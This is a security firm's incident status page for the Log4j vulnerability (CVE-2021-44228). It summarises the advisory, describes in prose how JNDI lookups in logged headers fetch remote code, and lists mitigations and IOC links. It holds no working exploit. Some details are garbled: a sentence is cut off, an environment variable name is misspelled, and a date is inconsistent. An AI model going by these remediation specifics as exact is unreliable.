UPDATE: SOC ADVISORY - Apache Log4j (CVE-2021-44228)
Incident Report for CyFlare
Resolved
This incident has been resolved.
Posted Mar 01, 2022 - 09:57 EST
Update
Dear Valued Subscriber,

CyFlare has completed a comprehensive audit of its internal and commercial systems, including our SIEM, advanced endpoint, vulnerability scanning, systems management, and SOAR tools. As a result, it is reasonably established that CyFlare is not impacted by the Apache Log4j vulnerabilities identified as CVE-2021-44228 and CVE-2021-45046.

CyFlare does not leverage any of the related components within its applications.

Furthermore, our upstream vendors have provided CyFlare with written statements of no impact. Therefore, there is no remediation required for any CyFlare services at this time. We further validated these statements by conducting internal vulnerability scans and engineering reviews and established that these systems are not affected. We are continuously monitoring the situation and will publish further updates as needed. If you have any questions or concerns, please do not hesitate to reach out to us at socir@cyflare.com.

Thank you,
The CyFlare SOC Team
Posted Jan 04, 2022 - 18:36 EST
Update
We are continuing to monitor for any further issues.
Posted Dec 14, 2021 - 13:09 EST
Monitoring
SOC ADVISORY - *** Apache Log4j (CVE-2021-44228) ***

New incident: Monitoring

***SOC ADVISORY *** Apache Log4j (CVE-2021-44228)

Posted Date: 12-13-21

Published Date: 12-10-21

Sources: CISA, Microsoft

DATE(S) ISSUED: 10-18-21

SUBJECT: Apache Log4j (CVE-2021-44228)

SEVERITY: Critical

BASE CVSS Score: 10.0

OVERVIEW: “The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote attacker could exploit this vulnerability to take control of an affected system. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.”

THREAT INTELLIGENCE: There are currently no reports of these vulnerabilities being exploited in

SYSTEMS AFFECTED: Apache Log4j v2.0-beta9 - 2.14.1

TECHNICAL SUMMARY: On December 6th, 2021, Apache released version 2.15.0 for Log4j, meant to address a vulnerability present in previous versions 2.0-beta9 to 2.14.1. This vulnerability allows attackers to perform remote code execution using JNDI lookups. Attackers that can control log messages or the log message parameters can execute code queried from LDAP servers when such parameters are enabled.

The attack occurs in servers hosting a vulnerable version of Log4j. Attackers will insert a JNDI lookup string in a header field containing queries to external servers. This string is then passed onto Log4j to be logged, where Log4j interprets the string and queries the specified malicious server. The server responds with malicious Java code provided by an external server and downloads and executes the code.

This vulnerability is listed as critical in severity, and users are recommended to upgrade all Apache Log4j servers to 2.15 and download the required security patches as soon as possible.

IOC Repositories:
https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8
https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217

MITIGATIONS/RECOMMENDATIONS: Microsoft recommends immediately applying all security patches relating to this vulnerability to remediate it. See the Apache CVE and security advisory for more details:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
https://logging.apache.org/log4j/2.x/security.html

The recommended action is to upgrade Log4j versions from 2.0 to 2.15.0. However, several workarounds exist to temporarily mitigate the vulnerability if this cannot be accomplished.

Log4j versions 2.10 to 2.14.1 allow for the parameter “log4j2.formatMsgNoLookups” to be set to “true” to disable the lookup feature that is exploited. The parameter “OG4J_FORMAT_MSG_NO_LOOKUPS” can be set to “true” to enforce the change as well.

Log4j versions 2.0-beta9 to 2.10 should have the JndiLookup class from the class path “zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class” disabled to temporarily mitigate the vulnerability.

STEPS TAKEN BY CYFLARE: CyFlare has detected this vulnerability activity across several clients and has notified them appropriately. Custom ATH rules have been created to detect and alert behavior regarding the vulnerability. Stellar Cyber BDS’s threat intelligence sources also have updated IDS signatures to accommodate this vulnerability, and all exploit attempt detections will alert on events involving “log4j”. CyFlare will continue to track the status of this vulnerability and will provide updates and assistance to our clients regarding this matter.

SOURCES:
https://logging.apache.org/log4j/2.x/security.html
https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
Posted Dec 14, 2021 - 13:09 EST
This incident affected: Breach Detection Service.